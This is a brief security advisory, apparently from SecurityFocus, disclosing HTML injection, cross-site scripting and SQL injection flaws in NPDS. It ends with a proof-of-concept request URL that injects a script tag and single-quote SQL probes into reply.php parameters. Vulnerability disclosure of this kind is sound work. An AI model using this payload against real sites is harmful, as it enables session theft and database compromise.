10 lines
No EOL
678 B
Text
10 lines
No EOL
678 B
Text
source: https://www.securityfocus.com/bid/13803/info
|
|
|
|
NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks.
|
|
|
|
This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
|
|
|
|
All versions of NPDS are considered vulnerable to this issue at the moment.
|
|
|
|
http://www.example.com/reply.php?post=1&forum=1&topic=1&stop=2&image_subject="><script>alert('je viens de recuperer ton
|
|
cookie');</script>&userdata='&time='&poster_ip='&hostname='&message=test&submit=Valider |